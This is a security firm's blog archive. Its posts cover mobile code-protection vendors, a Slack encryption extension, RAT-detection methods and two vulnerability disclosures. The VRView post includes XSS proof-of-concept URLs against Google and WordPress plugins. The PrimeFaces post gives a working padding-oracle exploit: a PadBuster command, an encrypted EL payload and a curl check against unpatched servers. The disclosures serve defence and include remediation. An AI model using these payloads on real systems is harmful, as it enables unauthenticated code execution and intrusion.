Wednesday, May 2, 2018

Antitamper Mobile - Minded Security's Magik Quadrant for Mobile Code Protection (2018 Edition)


Minded Security's Magik Quadrant for Mobile Code Protection shows our evaluation of the top vendors in this market, based on our research and experience, updated to 2018.

Magik Quadrant

 

Why care about Code Protection?

The main reason lies in the fact that Mobile Applications runs within an environment that is not under the control of the organization producing the code.

Lack of Code Protection could have the following consequences:
  • Malicious users or competitors could decompile the application and gain knowledge about proprietary algorithms or intellectual property
  • Using this information, it could be possible to modify the code, repackage it and redistribute it to create a "trojanized" clone of the App
  • Revenue loss due to piracy
  • Reputational damage

Since 2016, the OWASP Mobile Top 10 has included two new categories related to that, that is M8-Code Tampering and M9-Reverse Engineering.

Code Tampering

Code Tampering is the process of changing a mobile app (either the compiled app or the running process) or its environment to affect its behavior.
The most common code tampering techniques are:
  • Code Injection
  • Binary Patching
  • Local Resource Modification
  • Method hooking
  • Method Swizzling
  • Dynamic Memory Modification  
Tools and frameworks like Frida, Substrate, Cycript, Xposed and FLEX could give an attacker direct access to process memory and important structures such as live objects instantiated by the app. 
They come with many utility functions that are useful for resolving loaded libraries, hooking methods and native functions, and more.
This can provide the attacker a direct method of subverting the intended use of the software for personal or monetary gain.

Code Tampering could be prevented by detecting at runtime that code has been added or changed since compile time.

Reverse Engineering

Reverse engineering a mobile app is the process of analyzing the compiled app to extract information about its source code. 
An app is said to be susceptible to reverse engineering if an attacker can derive a reasonably accurate reconstruction of the source code from the binary.
Reverse Engineering could be prevented by using an obfuscation tool that implements controls like:
  • String Encryption
  • Name obfuscation
  • Control flow obfuscation
  • Arithmetic obfuscation


Also to that, it is important to implement anti-debugging techniques and verify if the application is running on a rooted/jailbroken device.


Some commercial tools provides code protection without requiring developers to implement their own custom controls.
The remaining of this blog post is going into details about the tools available in the market in 2018.

Interpreting the Magik Quadrant

The Magik Quadrant study performed on Code Protection solutions takes into account multiple criteria based on Ability to Execute and Completeness of Vision.

Ability to Execute
Vendors must deliver strong functionality in the following areas of capability:
  • Techniques implemented
  • After Sale Support

Completeness of Vision
Completeness of vision in the Code Protection market considers a vendor’s vision and plans for addressing buyer needs in the future:
  • Cross-platform support
  • Innovation
  • Sale Strategy

Before proceeding, it is worth noting that focusing on the leaders' quadrant isn't always the best choice. There are good reasons to consider market challengers. Moreover a niche player may support a specific needs better than a market leader.


Leaders
Leaders offer products and services that best cover current scenarios and are well positioned for the future. They provide solutions that are cross-platform, so with one vendor is possible to protect many platforms. Their complex solutions provide protection (through obfuscation, encryption, call hiding etc.), detection and reaction (in case an attack is detected).

Visionaries
In general, in any Magik Quadrant the Visionaries are the innovators. They understand well where the market is going and therefore they can provide innovative techniques to protect the applications in a cross-platform environment.

Niche Players
Niche Players, in our research, are vendors that do not offer, at the moment, a cross-platform solution but they are focused on a small segment. Since they are offering platform-specific solutions, in some case they are able to provide innovative and specific solutions for that specific target.


Vendor Strengths and Cautions

Arxan

This analysis pertains to Arxan's Application Protection.

Arxan is one of the most trusted names in application security. They provide protection against a widest range of static and dynamic attacks. The protection, provided by Application Protection, is implemented on different layers giving the chance to select the desired level of security.

Strengths:
  • Cross-platform: Android, iOS (Objective-C and Swift applications)
  • No changes to the source code 
  • Protection from reverse engineering and disassembly through obfuscation
  • Sophisticated Anti Code Tampering techniques
  • Threat Analytics feature
  • Latest OS versions supported

Cautions:
  • Price could be higher than expected
  • Strong binary obfuscation may interfere with the application functionalities

Company website: www.arxan.com


Inside Secure

This analysis pertains to Inside Secure Code Protection and WhiteBox.
Inside Secure is one of the leaders in the application security market. They provide a cross-platform solution based on different "modules".

Strengths:
  • Cross-platform: Android, iOS (Objective-C and Swift applications)
  • Strong Code and Flow obfuscation
  • Anti-tampering techniques
  • Strong cryptographic key protection

Cautions:
  • Price could be higher than expected
  • Strong binary obfuscation may interfere with the application functionalities

Company website: https://www.insidesecure.com/


Intertrust

This analysis pertains to Intertrust whiteCryption.
Intertrust is relatively new on this market but offers an innovative product that is designed to protect applications at all levels.

Strengths:
  • Pioneers in Whitebox Crypto 
  • Cross-platform: Android, iOS (Objective-C and Swift applications)
  • Tamper Resistance
  • Self-defending code
  • Code obfuscation
  • Anti-debugging techniques
  • Cross-checking of shared libraries 

Cautions:
  • Price could be higher than expected

GuardSquare

This analysis pertains to GuardSquare DexGuard and iXGuard.
GuardSquare is very famous since they develop and support ProGuard, that is the successful open source obfuscator for the Java language used for Android application. DexGuard is derived from that, while offering more advanced and sophisticated protections.
They have a great experience in Java and Android platform and recently they started offering also iOS support through the iXGuard software.

Strengths:
  • Solution is solid and one of the most used thanks also to the Proguard integration in Android Studio
  • Cross-platform: Android (Cordova and PhoneGap supported), iOS (Objective-C and Swift applications)
  • Large adoption among our customers
  • Strong code optimization and obfuscation 
  • Anti-tamper detection available for the Android platform

Cautions:
  • At this time iXGuard is offering only reverse engineering and not Anti-tampering protections for the iOS platform
  • As demo policy seems to be changed during 2017, it's harder to obtain evaluation versions; this could be a factor to consider if you have a time-constraint project
  • Price also has increased
  • Solution is one of the most used so it may be easier to find deobfuscation tools/information comparing to other solutions in the market

Company website: https://www.guardsquare.com


Licel

This analysis pertains to Licel's DexProtector.
Licel is a new competitor in code protection. Its product, DexProtector, is designed for comprehensive protection of Android applications mainly against reverse engineering, clone protection and tampering.

Strengths:
  • Affordable for our clients
  • Strong code obfuscation
  • Clone protection
  • SSL Pinning support
  • Root and Debug Detection

Cautions:
  • Available only for the Android platform
  • Some feature like Hooks Detection are additional features of the Enterprise version and priced separately

Company website: www.licelus.com


Bangcle - SecNeo

This analysis pertains to Bangcle AppShield, AppSCO and WhiteCrypto.

Strengths:
  • AppShield offers protections against debuggers, tampering, decompilation and malware insertion for Android applications
  • AppSCO offers reverse engineering protections (Android and iOS platform)
  • WhiteCrypto offers strong key protections (Android and iOS platform)

Cautions:
  • Anti Code tampering techniques are only offered for the Android platform 

Company website: http://www.bangcle.co.kr - https://www.secneo.com


Zelix

This analysis pertains to Zelix KlassMaster.
Zelix has a long story and experience in code obfuscation. Since its release in 1997, the Zelix KlassMaster Java code obfuscator has been continually developed to keep it at the forefront of obfuscation technology.
This solution provides a Java code obfuscator but it does not implement other protections such as those against code tampering attempts.

Strengths:
  • Strong code and flow obfuscation
  • Strong Call Hiding
  • Affordable for our clients

Cautions:
  • Available only for Java (Android)
  • Only code protection/obfuscation

Company website: www.zelix.com


Promon

This analysis pertains to Promon SHIELD.
Promon is a Norwegian firm specializing in app hardening focusing largely on Runtime Application Self-Protection (RASP).

Strengths:
  • Cross-platform: Android, iOS (Objective-C and Swift applications)
  • Rooting and Jailbreak detection
  • Repackaging Detection
  • Protections against Runtime App Tampering
  • Debugger Detection
  • SSL Pinning
  • Hook Detection

    Cautions:
    • New player in 2018 Magik Quadrant
    • "RASP" acronym usually applies to solutions that protect applications from vulnerabilities at runtime, it could not fit 100% this solution

    Company website: https://promon.co


    Important note: it is worth noting that all these security controls do not give a guarantee that mobile applications are going to be 100% secure, but they can provide additional protection and make very hard for an attacker to carry on reverse engineering, tampering and runtime attacks.


    Monday, April 30, 2018

    Shhlack, message encryption for Slack



    A common problem about centralized messaging solutions is the sharing of sensitive information during day by day use, preserving, at the same time, message integrity and privacy.

    Sometimes two parties may need to share some information that is confidential and should not be accessed by a third party.

    A third party could be, for example:
    • a service provider
    • an external attacker
    • a malicious operator of the platform

    Conversations may be exposed to third parties, for example, in case of account compromise or by storing Slack backups insecurely.

    How many users share passwords directly via Slack private messages?
    I hope just a few, but the sad truth is... probably many.

     

    Protecting Slack users Privacy after Policy Update


    Scenarios are getting more complex after the introduction of GDPR and new Slack privacy policy.

    Starting April 20, under the updated privacy policy, Slack compliance reports are being discontinued and the downloading options expanded. Those who buy the Plus plan can request access to “a self-service export tool” to download “all data from their workspace.” This includes “content from public and private channels and direct messages.

    And most important:

    Automatic notices to employees will be discontinued. The employer will now decide whether users will be told their conversations are being exported.

    Employers may decide to not inform users about conversation export; therefore company Slack users may not be informed of the export with a result of not being alerted of the potential data exposure.

    Even if this feature could have its benefits, it could also be abused by a malicious third party to access conversations without alerting company users.


    For more information regarding the analysis of Slack privacy policy update:


    Summing up the latter news and our previous concerns about centralized storage of sensitive information, we decided to create something on top of Slack in order to add per message encryption via pre shared keys, that's why Shhlack was created.

     Shhlack is an opensource tool available on GitHub:

    Shhlack: Welcome to the era of encrypted Slack!


    Shhlack is an extension for Slack and brings end-to-end encrypted messages in Slack workspaces.

    Shhlack is available as




    Shhlack is not a Slack bot. Instead it injects itself in the Slack web UI and uses Slack internal client APIs to encrypt/decrypt messages on the fly by choosing a passphrase from a set of stored keys owned by the user using cryptojs.AES JS library.


    When a user receives an encrypted message and owns the correct PSK, message will be shown as preformatted text:






    On the other hand any user that receives the message but hasn't Shhlack installed or doesn't own the correct PSK, will see the content as a bunch of base64 encoded "garbage":




    It supports the usage of multiple keys, meaning that a user can have more than one key that can be shared with other users.

    At the moment Shhlack relies on pre-shared keys that need to be exchanged between users to get the ability to send and receive encrypted messages.
    To facilitate PSK exchanging it is possible to import/export the keys as base64 encoded JSON object.

    Creating Messages 

    In order to create a new message click on the Shhlack icon near the message bar or press Alt+S and a dialog box will appear:



    Then:
    • To give Slack the opportunity to index some clear text data for future text based search it is possible to add a title that will be kept as clear text
    • then the user can choose a particular PSK from the storage
    • finally the super secret message can be written and sent.
    NB:
    Slack servers won't see anything in clear text, nor Slack Bots. Only users - and bots - owning the correct PSK will be able to get the unencrypted content.

    Improvements and Future Expectations

    If, as we hope, this project will get some traction from the public and a community will help us maintaining the code and add new features, there's a very exciting TODO list such as:
    • Use of browser WebCrypto features to encrypt the PSK set on the client itself with a secret masterkey.
    • Per channel encryption
    • Improve message rendering features, encrypt snippets and releated
    • Asymmetric message encryption via public/private certificates
    • your feature request!
    Enjoy Shhlack and experiment as much as you want!

    We'll be looking forward to get your feedback.


    Monday, April 23, 2018

    DOM XSS in Google VRView library


    While testing the VRView web application we discovered a DOM Based Cross-Site Scripting Vulnerability in the handling of errors through an inappropriate use of the "innerHTML" property. The use of this property must be combined with the encoding of the data before it is used for data assignment, and in this case it wasn't used safely.

    Since the vulnerability also affects two of the most used Wordpress vrview plugins, an attacker could take control of the remote system that uses these plugins through a code analysis, or through automated tools.

    Depending on the type of vulnerability and the role of the vulnerable component within the system, it can lead to trivial effects on the complete ownership of the server and the compromise of any data contained in it. The aspect to always keep in mind is that for the execution of the external components the principle of the minimum privilege is almost never applied.


    About VRView


    Vrview is a library developed by Google for embedding immersive media into traditional websites.

    As described on the main website: https://developers.google.com/vr/concepts/vrview

    VR view allows you to embed 360 degree VR media into websites on desktop and mobile, and native apps on Android and iOS. This technology is designed to enable developers of traditional apps to enhance the apps with immersive content. For example, VR view makes it easy for a travel app to provide viewers with an underwater scuba diving tour as they plan a vacation or for a home builder to take prospective buyers on a virtual walk-through before the home is built.


    The Vulnerability


    The vulnerability lies in the management of library errors, in fact, if it is specified through URL parameters: url or image, a nonexistent resource, the library returns an error including in the error message the resource specified in the request without executing the output encoding .



    As can be seen from the code below, the user input data passed through the GET request parameters is passed to the "innerHTML" property without performing the parameter encoding output. In this way, an attacker can specify an XSS payload instead of the requested resource, the library will interpret the resource as non-existent and respond with an error indicating the XSS payload entered by the attacker, thus generating an arbitrary code execution Javascript.

    The following shows the vulnerable code in the VRView library:

    URL: https://github.com/googlevr/vrview/blob/master/src/embed/main.js

    /* [...] */
    function onSceneError(message) {
        showError('Loader: ' + message);
    }
    
    function onRenderError(message) {
        showError('Render: ' + message);
    }
    
    /* [...] */
    
    function showError(message, opt_title) {
       // Hide loading indicator.
       loadIndicator.hide();
    
       var error = document.querySelector('#error');
       error.classList.add('visible');
       error.querySelector('.message').innerHTML = message;
    
       var title = (opt_title !== undefined ? opt_title : 'Error');
       error.querySelector('.title').innerHTML = title;
    }
    
    /* [...] */
    


    Proof of Concept


    The links below shows the vulnerability in real world example, the vulnerability includes other sub/domains that have not been mentioned such as "storage.googleapis.com".

    URL: https://vr.google.com/earth/vrview/?url=%3Cimg%20src=x%20onerror=alert(document.domain)%3E



    URL: http://googlevr.github.io/vrview/index.html?image=%3Cimg%20src=x%20onerror=alert(document.domain)%3E


    Please note that the links above contains a patched version of the library.


    Vulnerable Wordpress Plugins


    Following are the two vulnerable Wordpress plugins found during the vulnerability analysis.

    1) WP-VR-view - https://it.wordpress.org/plugins/wp-vr-view/

    WP-VR-view is a plugin that allows you to display Photo Sphere images and 360 video on wordpress pages, posts, etc.
    Website visitors will be able to navigate through your panoramas.
    Smartphone users can use Google cardboard to look through in Virtual reality way.

    Proof of Concept:
    http://example.org/wordpress/wp-content/plugins/wp-vr-view/asset/?image=<img%20src=x%20onerror=alert(document.domain)>


    2) VRView - https://it.wordpress.org/plugins/vrview/

    VRView makes it easy to embedd Googles VRView into your WordPress installation.
    Embed 360° Videos and VR Videos as Well as panorama photos into your WordPress-Installation.

    Proof of Concept:
    http://example.org/wordpress/wp-content/plugins/vrview/vrview/?image=<img%20src=x%20onerror=alert(document.domain)>


    Please refer to section A9 of the OWASP Top 10 to check if the application makes use of external components, libraries, frameworks and dependencies from modules that are affected by known vulnerabilities:

    A9 - Using Components with Known Vulnerabilities
    https://www.owasp.org/index.php/Top_10_2017-A9-Using_Components_with_Known_Vulnerabilities


    Disclosure Timeline


    • 19-01-2017 – Report to Google Security Team;
    • 20-01-2017 – Received a first feedback said that the report was triaged;
    • 20-01-2017 – Received a second feedback said that the vulnerability exists;
    • 14-02-2017 – Reply from Google Security Bot - The panel has decided to issue a reward of $3133,7;
    • 16-03-2018 – The vulnerability was fixed (https://github.com/googlevr/vrview/pull/308);
    • 23-04-2018 – Public disclosure.

    Acknowledgement


    Google VRP panel has decided to reward with a high reward as the vulnerability is included not only in sandboxed domains but also google.com.
    Vulnerability Found and Reported by Federico Fazzi.


    Monday, November 27, 2017

    JavaScript security and tools evolution talk at OWASP Taiwan Week 2017

    In this presentation are explained the modern improvements in JavaScript and Client (Browser) security features. Still, the increase of complexity in XSS attacks and vulnerabilities is driving the adoption of cutting-edge analysis tools for vulnerability discovering and analysis. At the end of the presentation, there is a demonstration of how BlueClosure can accomplish that with dynamic JavaScript analysis and fuzzing capabilities.


    Slides:
    https://www.slideshare.net/secret/NFIshhcqYVIHEp
    Conference site:
    http://2017.owasp.org.tw/speakers_01.html


    Monday, June 26, 2017

    OWASP Summit 2017: what's new?


    Last week we attended the OWASP Summit 2017 in Woburn Forest Center Parcs near London.

    The OWASP Summit 2017 was a 5-days participant driven event, dedicated to the collaboration of Development and Security professionals, with a strong focus on DevSecOps.

    Here, hundreds of OWASPers and AppSec experts did fantastic interactive working sessions. The idea was to promote new ideas, start new projects with a selected team or restart OWASP projects with the aims to produce a new version.

    It was more than good to meet new young students and professionals really interested to give a contribute to the project.

     

    Every day we had working sessions for a total of 173 at the end of the summit.

    The outcome consisted in several discussions between the participants, a list of actions and, in some cases, a new draft for a new project.

    So what are the main outcomings that could be really interesting for people passionate on AppSec?
    Let's group the most promising projects based on the roles in a company.

    CISO:
    - OWASP CISO Guide: its goal is to help CISOs on managing application security programs according to CISO roles, responsibilities, perspectives, and needs. Application security best practices and OWASP resources are referenced throughout this guide. You can download the actual CISO Guide here.
    GDPR and DPO AppSec implications: GDPR (General Data Protection Regulation) is a major EU Regulation which will affect every company that does business with the EU, which is just about every major company worldwide.This Working Session discussed some aspects of GDPR, including the role of the DPO (Data Protection Officer), the wider definition of PII data (like IP Addresses), and the need to report breaches and incidents within a short time period.


    - Auditors, Testers:
    - OWASP Mobile Testing Guide, one of the most active project during the Summit focused  on testing iOS and Android applications.
    - OWASP Testing Guide v5, the standard de facto to perform a Web Application Penetration Testing. If you want to collaborate to this project that we are leading together with Andrew Muller please send us an email. 


    - DevSecOps: 
    - Define Agile Security Practices: the idea of using Agile in Security Practices/Activities makes a lot of sense but what does it mean? This Working Session started defining those practices in easy-to-use and scalable formats and documentation. 
    - DevSecOps Track: we had many working sessions on DevSecOps.
    - Pwning OWASP Juice Shop is a web application with 42+ intended security vulnerabilities, the OWASP Juice Shop is supposed to be the opposite of a best practice or template application for web developers: it is an awareness, training, demonstration and exercise tool for security risks in modern web applications.

    OWASP is an open community that encourage new contributions. If you want to collaborate you can start from here.

    See you next year!



    Monday, February 15, 2016

    RCE in Oracle NetBeans Opensource Plugins: PrimeFaces 5.x Expression Language Injection

    PrimeFaces is a open source User Interface (UI) component library for JavaServer Faces (JSF) based applications, since its release, PrimeFaces has been strongly supported by Oracle, particularly within the NetBeans world.

    Disclosure Timeline

    PrimeFaces team has been contacted on 20/06/2015 (7 months ago) providing  the following details. Unfortunately the vulnerability has still not been fixed.

    PrimeFaces team was asking us to send a github pull request to the public PrimeFaces github dev group; since public pull requests can be read by anyone, we thought that we could link this public content to inform both developers and final users.

    PrimeOracle and PrimeSecret Vulnerability Detail

    The following two issues have been successfully exploited against PrimeFaces 5.x and 5.3.x, including but not limited to PrimeFaces 5.3.6 version.

    The following video shows the impact of these vulnerabilities against a vulnerable Oracle Netbeans 8.0.2 setup with PrimeFaces plugin:




    Security issues are cryptographic vulnerabilities that let unauthenticated users to inject arbitrary Expression Language code to PrimeFaces custom EL parser. Both issues have the same sink: EL expression evaluation.

    In this post we shared a generic payload to execute a remote interactive command shell via EL .

    These two Crypto issues have been called "PrimeSecret" and "PrimeOracle".

    Eventually by abusing one of these issues any user can execute arbitrary code on the application server without authentication.

    1) PrimeSecret is the default hard-coded passphrase to encrypt several PrimeFaces parameters such as "pfdrid" (by Stefano Di Paola).

    2) PrimeOracle is the abuse of a Padding Oracle attack against the internal crypto algorithm that decrypts several parameters such as "pfdrid" (by Giorgio Fedon).


    The common vulnerable sink for both security issues is the PrimeFaces Streamed Content Handler that executes EL inline:

    /org/primefaces/application/resource/StreamedContentHandler.java

    ..
    String dynamicContentId = (String)
    params.get(Constants.DYNAMIC_CONTENT_PARAM);
    ...
    String dynamicContentEL = strEn.decrypt(dynamicContentId);
    ...
    ValueExpression ve =
    context.getApplication().getExpressionFactory().createValueExpression(context.getELContext(),
    dynamicContentEL, StreametreamedContent.class);
    streamedContent = (StreamedContent) ve.getValue(eLContext);



    In 2011 a user already reported to the dev team the dangerous impacts of EL injection: 
    StreamlinedContent is not a new sink to PrimeFaces dev community as clearly stated in that old post. However at that time the issue was much easier to be exploited.

    In short we bypassed a partial security fix available in the newer versions of Primefaces to abuse a known vulnerability.

    PrimeSecret


    Vulnerable Code that leads to PrimeSecret:

    file: "/org/primefaces/config/ConfigContainer.java"

    // By default encryption Key is the hardcoded string "primefaces"

    secretKey = (value == null) ? "primefaces" : value;


    PrimeOracle


    Vulnerable Code that leads to PrimeOracle:

    file: "/org/primefaces/util/StringEncrypter.java"


    // 8-bytes Salt <- Static IV
    byte[] salt = {
    (byte) 0xA9, (byte) 0x9B, (byte) 0xC8, (byte) 0x32,
    (byte) 0x56, (byte) 0x34, (byte) 0xE3, (byte) 0x03
    };
    ...


    // Padding Oracle vulnerability since the DES cipher is CBC based
    // and process encrypted text without verification (e.g. // HMAC)

    KeySpec keySpec = new PBEKeySpec(passPhrase.toCharArray(),
    salt, iterationCount);
    SecretKey key =
    SecretKeyFactory.getInstance("PBEWithMD5AndDES").generateSecret(keySpec);


    Exploitation is easy with PadBuster


    In the following example we are going to show the exploitation of  PrimeOracle issue. PrimeOracle exploit can be seen as a generic way to exploit both issues. With PrimeOracle is possible to obtain a resulting exploit parameter string that can be reused against all targets with the same password.

    That resulting string obtained from a host vulnerable to Primesecret, will work against all the target with the default secretKey configuration parameter.

    First of all for this exploit to work you need a tool to exploit Padding Oracle Vulnerabilities like the beautiful PadBuster tool from GDS Security. Then you can choose any EL payload to be encrypt using the tool.

    In this case the payload we have chosen is:

    // Set a response Header with a value of "primesecretchk" Request Parameter
    ${facesContext.getExternalContext().setResponseHeader("primesecretchk",request.getParameter("primesecretchk"))}


    Note: Any EL can be executed: payloads can range from reading user session parameters, to arbitrary code execution that can lead to OS compromise.

    Then just launch Padbuster with the following command:

    ./padBuster.pl
    "http://localhost:8085/showcase-5.1/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=C24UkygWm3HMmnSxmDwoxw%3D%3D"
    "C24UkygWm3HMmnSxmDwoxw%3D%3D" 8 -encoding 0 -plaintext
    '${facesContext.getExternalContext().setResponseHeader("primesecretchk",request.getParameter("primesecretchk"))}'


    +-------------------------------------------+
    | PadBuster - v0.3.3                        |
    | Brian Holyfield - Gotham Digital Science  |
    | labs@gdssecurity.com                      |
    +-------------------------------------------+

    INFO: The original request returned the following
    [+] Status: 500
    [+] Location: N/A
    [+] Content Length: 65766

    INFO: Starting PadBuster Encrypt Mode
    [+] Number of Blocks: 14

    INFO: No error string was provided...starting response analysis

    *** Response Analysis Complete ***

    The following response signatures were returned:

    -------------------------------------------------------
    ID#    Freq    Status    Length    Location
    -------------------------------------------------------
    1    1    500    65715    N/A
    2 **    255    200    0    N/A
    -------------------------------------------------------

    Enter an ID that matches the error condition
    NOTE: The ID# marked with ** is recommended :2

    -------------------------------------------------------
    ** Finished ***

    [+] Encrypted value is:
    wQR45Hj4OwBRgKBtl5v%2FG4elO1lYWl%2BZfvjy1R79FgJ%2F3H%2BKYopezNVswr9KFx%2B8XaKwW6Tq3bG8OxNcX3CjCO5%2F1SsvFbW8gn6BL38vAt03Pz2scc3fGrGm3Vi7A7wdmqDjIu5mWyXWVXipcGirQgAAAAAAAAAA

    -------------------------------------------------------


    To check if the application is vulnerable:

    n0def@n0def-U36SG:~/Desktop/PadBuster-master$
    enc="wQR45Hj4OwBRgKBtl5v%2FG4elO1lYWl%2BZfvjy1R79FgJ%2F3H%2BKYopezNVswr9KFx%2B8XaKwW6Tq3bG8OxNcX3CjCO5%2F1SsvFbW8gn6BL38vAt03Pz2scc3fGrGm3Vi7A7wdmqDjIu5mWyXWVXipcGirQgAAAAAAAAAA";
    chk="123445456"; curl -X POST
    "http://localhost:8085/showcase-5.1/javax.faces.resource/dynamiccontent.properties.xhtml"
    -ki -kvvv -d "pfdrt=sc&ln=primefaces&pfdrid=$enc&primesecretchk=$chk"| grep $chk

    primesecretchk: 123445456



    //Note: the previous request will work against all systems vulnerable to PrimeSecret! Since // has been generated on a host with "primefaces" secretKey



    The application is vulnerable because of the new added response header: "primesecretchk: 123445456"

    Remediation

    Since an official patch is still not available end users and companies can protect their application by disabling StreamedContentHandler.java.

    Alternatively by filtering incoming requests with pfdrid parameter (value longer than 16bytes and Base64 encoded) and "pfdrt=sc" is possible to mitigate the attack: "pfdrt=sc" calls the vulnerable StreamedContent Method and pfdrid contains the exploit payload.

    Isn't enough to change the default "secretKey"?

    Unfortunately not: changing the default secretKey is not enough because of the padding oracle vulnerability issue that in this post has been named PrimeOracle.


    Friday, February 5, 2016

    RAT WARS 2.0: Advanced Techniques for Detecting RAT Screen Control


    In the landscape of web maliciousness Remote Administration Trojans [1] are not a new trend but their usage is still strong and growing steady.

    At its core a RAT is a backdoor facility used to let an attacker enter unnoticed into the victim computer to control it remotely: for example most banking trojan nowadays are using remote desktop modules to open a VNC/RDP channel to allow an attacker to exfiltrate the money from within the users browser inside its legit session.

    Newer sophisticated malware like Dyre are stepped up the game by completely diverting the user on fake banking portals while keeping the login session alive in the background, and once the user has disclosed the required credentials, the attacker connect to the user machine via a remote desktop channel and perform the wire fraud unnoticed.

    RAT Screen Control


    The usual attack is comprised by two phases.

    The first step is when a Dyre infected user enter the banking website location inside the browser and the request is proxied by the malware to a fake website that is identical to the bank website just after the real login. In the background Dyre keep the real banking session open.
    The second phase happens as soon as the attacker receives an automated Jabber notification with user session data and a VNC callback to a protected terminal server. He then starts interacting with the user by sending challenging questions, fake pages and fake login field to the fake browsing session to the user. The user start answering the attackers forms providing needed information while the attacker starts a screen control session towards the user PC to use the real user session to perform the wire fraud.

    This is why this kind of attack it is so hard to detect: for the most part the attack killchain [2] is happening out of reach from the bank's anti fraud capabilities. The only exception is the final exfiltration phase when the only thing left is the chance to detect the attacker session, but even then the attacker is coming from within the legit user session making things harder.
    These inner weaknesses of classic agentless fraud detection techniques are the reason behind the increase of popularity and sophistication of this kind of attacks.
    Since what agentless fraud detections can do is to detect infected users or detect the attacker session by diverting users to web fakes and masquerading the attacker session there is a high chance to nullify the whole detection.

    Then how can a bank portal understand what’s going on if what they see is a session initiated from the usual user’s ip address, from the usual user’s browser fingerprint, without any kind of webinject/AST or other common indicators of compromise?

    Advanced RAT detection techniques.


    To respond to this new kind of fraud Minded Security has started to research viable detection techniques and implemented a new solution based on Telemetry Modeling.

    This is a short description of the viable detection techniques: Desktop Properties Detection, Detection of Velocity Pings or Session Keepalives, Telemetry Modeling of User Biometrics, Telemetry Modeling of Protocols and IOC Detection.

    Desktop Properties Detection

    This is the most basic detection whose point is to detect anomalies in the properties of the browser/desktop used: for example older RDP protocols might alter the color depth, or hidden VNC session may have unusual desktop resolutions.

    Those indicators can be tracked and then correlated to build a detection.

    Detection of Velocity Pings or Session Keepalives

    While waiting for the user to disclose his PIN/OTP the attacker must keep the user session alive if he want to use it later to perform a wire transfer. This is what “velocity pings” are for: periodic faster HTTP requests whose goal is to keep the session alive.

    The requests cadence, their content can be used to build an indicator of compromise and trigger a detection.


    Telemetry Modeling of User Biometrics


    The point of this approach is to track the user telemetry (keyboard usage, mouse movements, input gestures) to build a model of the user. Once the model is built it is used as yardstick in an anomaly detection context: the output provided give an insight if the current session is being used by the usual users.

    Unfortunately while this information is indeed useful, the weaknesses are manifold.
    First the infrastructure needed is far from lightweight: it needs to store big data for the user models and has to run complex machine learning algorithms nearly real time to perform the anomaly detection. This means a complex and expensive infrastructure.
    Secondly the detection is fooled in the corner case of a single machine shared by different people, think of a corporate environment [3].


    Telemetry Modeling of Protocols

    This detection is one of the most advanced and relies on tracking glitches and anomalies in how the user’s telemetry is transmitted by the desktop remote protocol.

    For example if there is a remote desktop in place, the telemetry data is compressed and passed trough by the remote desktop protocol itself or if the user is browsing the bank page trough a virtual machine, the input is filtered by the VM layer. All these added software layers operates to synchronize between the input received and the input reproduced adding glitches that could be tracked as anomalies.

    This let to have a very light engine that is able to lively catch latency generated by user interface flowing through filter-driver chains. Typically VM guest environments and remote control tools install additional layered interfaces to replicate cursor positions and this creates latency patterns we can detect.



    Once these anomalies are collected they are used to understand in real time if there is a remote connection in place. We provide this detection approach in our anti fraud suite AMT - RATDET Module.


    IOC Detection

    A malware infection can alter the profile of the user’s machine/browser and these alterations could be tracked and used as indicators of compromise to flag the user as a potential victim of fraud.

    Or it could be possible to check the existence of certain files on the user file system, like suspicious executables, hidden vnc servers and others that can be used as an evidence of infection.

    As an example here is a brief proof of concept that is also used by common exploit kits:




    These indicators vary from malware to malware but are indeed very useful to prevent a fraud in the early stage of the killchain, as soon the user is infected and before the exfiltration is put in place.



    In conclusion In this rat-race against financial malware there is not a de facto detection to be used: malware are constantly evolving and so should our defense techniques

    In our opinion the recipe to a successful anti fraud monitoring lies into having a flexible and modular approach: mixing different detection techniques to build an unified risk model of the users.
    [3]: A provider for this kind of solution is BioCatch.